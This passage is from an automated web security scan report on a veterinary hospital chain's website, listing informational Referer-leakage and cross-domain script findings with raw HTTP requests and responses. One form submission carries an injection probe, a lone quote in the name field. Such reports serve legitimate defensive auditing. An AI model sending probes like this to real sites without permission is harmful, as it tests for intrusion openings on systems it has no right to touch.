The page was loaded from a URL containing a query string: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
The response contains the following links to other domains:
http://gmaps-utility-library.googlecode.com/svn/trunk/markermanager/release/src/markermanager.js
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA3yAtykvNwfZWXFMr5jaqbxQe81n6rsu4MMpbal4noyhM4BdC2xR3zat7Gh8uvXlxFvDMbMR1N9w9xw
Request
GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:03:36 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=3qhitggrmrfo3b1eptve2npsb6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 10741 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <div class="content"><script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA3yAtykvNwfZWXFMr5jaqbxQe81n6rsu4MMpbal4noyhM4BdC2xR3zat7Gh8uvXlxFvDMbMR1N9w9xw" type="text/javascript"> </script><script src="http://gmaps-utility-library.googlecode.com/svn/trunk/markermanager/release/src/markermanager.js" type="text/javascript"> </script>...[SNIP]...
7.5. http://www.vcahospitals.com/main/offer/thank-you.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/thank-you.html
Issue detail
The page was loaded from a URL containing a query string: http://www.vcahospitals.com/main/offer/thank-you.html?
The response contains the following links to other domains:
http://ad.doubleclick.net/activity;src=1451979;type=freef218;cat=freef146;u5=3;u2=3;u3=http://www.vcahospitals.com/main/offer;u4=2505B0C6-B6AA-4144-878F-54873D353284;ord=1;num=1?
http://ad.doubleclick.net/activity;src=1488778;type=iypgu946;cat=freei882;u5=3;u2=3;u3=http://www.vcahospitals.com/main/offer;u4=2505B0C6-B6AA-4144-878F-54873D353284;ord=1;num=1?
http://www.facebook.com/VCAAnimalHospitals
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1070113585/?label=oR9eCK-p8QEQscai_gM&guid=ON&script=0
https://538.xg4ken.com/media/redir.php?track=1&token=d4f86ccb-dcf1-4046-b4cb-a3621a0c0741&type=ffecoupon&val=0.0&orderId=&promoCode=3|http://www.vcahospitals.com/main/offer|2505B0C6-B6AA-4144-878F-54873D353284|CORP|3&valueCurrency=USD
https://538.xg4ken.com/media/redir.php?track=1&token=d4f86ccb-dcf1-4046-b4cb-a3621a0c0741&type=lead&val=0.0&orderId=&promoCode=3|http://www.vcahospitals.com/main/offer|2505B0C6-B6AA-4144-878F-54873D353284|CORP|3&valueCurrency=USD
Request
POST /main/offer/thank-you.html? HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.vcahospitals.com Cookie: PHPSESSID=pias4t8ogigkmu02ec2s4oaee1 Accept-Encoding: gzip, deflate Content-Length: 491 fname='&lname=Ronald+Smith&addr=3&city=3&state=FL&zip=3&phone=3&email=netsparker%40example.com&other=3&petname=Ronald+Smith&petage=3&variant=3&submit=Get+FREE+Coupon&token=868810f83ce860bcd4cc393ef5f6...[SNIP]...
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:42 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 11572 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... </script> <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <div style="display:inline;"> <img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1070113585/?label=oR9eCK-p8QEQscai_gM&guid=ON&script=0"/> </div>...[SNIP]... <noscript> <img src="http://ad.doubleclick.net/activity;src=1451979;type=freef218;cat=freef146;u5=3;u2=3;u3=http://www.vcahospitals.com/main/offer;u4=2505B0C6-B6AA-4144-878F-54873D353284;ord=1;num=1?" width="1" height="1" alt=""> </noscript>...[SNIP]... <noscript> <img src="http://ad.doubleclick.net/activity;src=1488778;type=iypgu946;cat=freei882;u5=3;u2=3;u3=http://www.vcahospitals.com/main/offer;u4=2505B0C6-B6AA-4144-878F-54873D353284;ord=1;num=1?" width=1 height=1 border=0> </noscript>...[SNIP]... <noscript> <img src="https://538.xg4ken.com/media/redir.php?track=1&token=d4f86ccb-dcf1-4046-b4cb-a3621a0c0741&type=lead&val=0.0&orderId=&promoCode=3|http://www.vcahospitals.com/main/offer|2505B0C6-B6AA-4144-878F-54873D353284|CORP|3&valueCurrency=USD" width="1" height="1"> </noscript>...[SNIP]... <noscript> <img src="https://538.xg4ken.com/media/redir.php?track=1&token=d4f86ccb-dcf1-4046-b4cb-a3621a0c0741&type=ffecoupon&val=0.0&orderId=&promoCode=3|http://www.vcahospitals.com/main/offer|2505B0C6-B6AA-4144-878F-54873D353284|CORP|3&valueCurrency=USD" width="1" height="1"> </noscript>...[SNIP]... 
<li><a href="http://www.facebook.com/VCAAnimalHospitals" target="_blank"> Like us on Facebook <img src="/img/logo-facebook-like.png" style="vertical-align:bottom;" />...[SNIP]...
7.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The page was loaded from a URL containing a query string:http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526ema
il%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dM
ozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%
The response contains the following links to other domains:
http://vca.unicaondemand.com/ods/js/imodTag.js
http://www.facebook.com/VCAAnimalHospitals
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214
.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252b
NT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:45:40 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=ujbf7feteup2muqgmimolpdqs6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 25455 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... </script> <script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"> </script>...[SNIP]... <li><a href="http://www.facebook.com/VCAAnimalHospitals" target="_blank"> Like us on Facebook <img src="/img/logo-facebook-like.png" style="vertical-align:bottom;" />...[SNIP]...
8. Cross-domain script include
There are 14 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user. If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
8.1. http://www.vcahospitals.com/favicon.ico
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /favicon.ico
Issue detail
The response dynamically includes the following script from another domain: http://vca.unicaondemand.com/ods/js/imodTag.js
Request
GET /favicon.ico HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0; __utmz=107294085.1299326665.1.1.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.1.10.1299326665
Response
HTTP/1.1 302 Found Date: Sat, 05 Mar 2011 12:03:51 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Location: http://www.vcahospitals.com Content-Type: text/html Content-Length: 9421 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte...[SNIP]... </script> <script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"> </script>...[SNIP]...
8.2. http://www.vcahospitals.com/hanson
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson
Issue detail
The response dynamically includes the following script from another domain: http://vca.unicaondemand.com/ods/js/imodTag.js
Request
GET /hanson HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.13.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:45:02 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 11488 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte...[SNIP]... </script> <script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"> </script>...[SNIP]...
8.3. http://www.vcahospitals.com/hanson/appt.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/appt.html
Issue detail
The response dynamically includes the following script from another domain: http://vca.unicaondemand.com/ods/js/imodTag.js
Request
GET /hanson/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/hanson Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:45:41 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 20870 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... </script> <script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"> </script>...[SNIP]...
8.4. http://www.vcahospitals.com/hanson/offer.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/offer.html
Issue detail
The response dynamically includes the following script from another domain: http://vca.unicaondemand.com/ods/js/imodTag.js
Request
GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526to
ken%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:51:40 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=j1fqeocn1q0uhv2hk1geg4cm22; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19335 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... </script> <script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"> </script>...[SNIP]...
8.5. http://www.vcahospitals.com/main/directory.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/directory.html
Issue detail
The response dynamically includes the following scripts from other domains:
http://gmaps-utility-library.googlecode.com/svn/trunk/markermanager/release/src/markermanager.js
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA3yAtykvNwfZWXFMr5jaqbxQe81n6rsu4MMpbal4noyhM4BdC2xR3zat7Gh8uvXlxFvDMbMR1N9w9xw
Request
GET /main/directory.html?utm_content=link.corp.ffe.locator. HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.5.10.1299326665
Response
